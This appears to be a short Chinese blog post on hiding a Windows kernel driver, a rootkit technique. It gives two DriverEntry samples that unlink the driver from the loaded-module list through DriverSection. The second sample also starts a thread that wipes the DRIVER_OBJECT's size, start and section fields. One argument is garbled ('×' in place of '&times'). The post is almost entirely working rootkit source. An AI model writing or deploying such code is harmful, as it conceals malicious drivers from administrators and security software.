[Rootkit] 驱动隐藏 - 断链

注意 ： 此方法会触发 PG

代码参考 1

typedef struct _driverdata
{
	LIST_ENTRY listentry;
	ULONG unknown1;
	ULONG unknown2;
	ULONG unknown3;
	ULONG unknown4;
	ULONG unknown5;
	ULONG unknown6;
	ULONG unknown7;
	UNICODE_STRING path;
	UNICODE_STRING name;
}driverdata;



VOID xiezai1(PDRIVER_OBJECT qudongduixiang)
{
   
	KdPrint(("驱动卸载\n"));
}
 
NTSTATUS DriverEntry(PDRIVER_OBJECT qudongduixiang, PUNICODE_STRING zhucebiao)
{
	KdPrint(("驱动入口开始\n"));
	driverdata*driverdata1 = NULL;
	driverdata1 = *(driverdata**)((ULONG)qudongduixiang + 20);
	if (driverdata1!=NULL)
	{
		*(ULONG*)driverdata1->listentry.Blink = (ULONG)driverdata1->listentry.Flink;
		driverdata1->listentry.Flink->Blink = driverdata1->listentry.Blink;
	}
	qudongduixiang->DriverUnload = xiezai1;
	return STATUS_SUCCESS;
}

代码参考 2

#include "ntddk.h"
HANDLE hThread;
VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
	DbgPrint("驱动卸载成功\n");
}

VOID ThreadRun(
	 PVOID StartContext)
{
	LARGE_INTEGER times;
	PDRIVER_OBJECT pDriverObject;
	times.QuadPart = -30 * 1000 * 1000;  //等待3秒  单位是纳秒
	
	KeDelayExecutionThread(KernelMode, FALSE, ×);
	pDriverObject=(PDRIVER_OBJECT)StartContext;
	//修改模块信息
	pDriverObject->DriverSize = 0;
	pDriverObject->DriverSection = NULL;
	pDriverObject->DriverExtension = NULL;
	pDriverObject->DriverStart = NULL;
	pDriverObject->DriverInit = NULL;
	pDriverObject->FastIoDispatch = NULL;
	pDriverObject->DriverStartIo = NULL;
	
	ZwClose(hThread);
}


NTSTATUS	DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pReg)
{
	PLIST_ENTRY pModuleList;
	pModuleList = pDriverObject->DriverSection;
	
	//前一个模块的Flink=本模块的Flink
	pModuleList->Blink->Flink = pModuleList->Flink;
	//前一个模块的Blink=本模块的Blink
	pModuleList->Flink->Blink = pModuleList->Blink;
	PsCreateSystemThread(&hThread,GENERIC_ALL,NULL,NULL,NULL, ThreadRun, pDriverObject);
	return 0;
}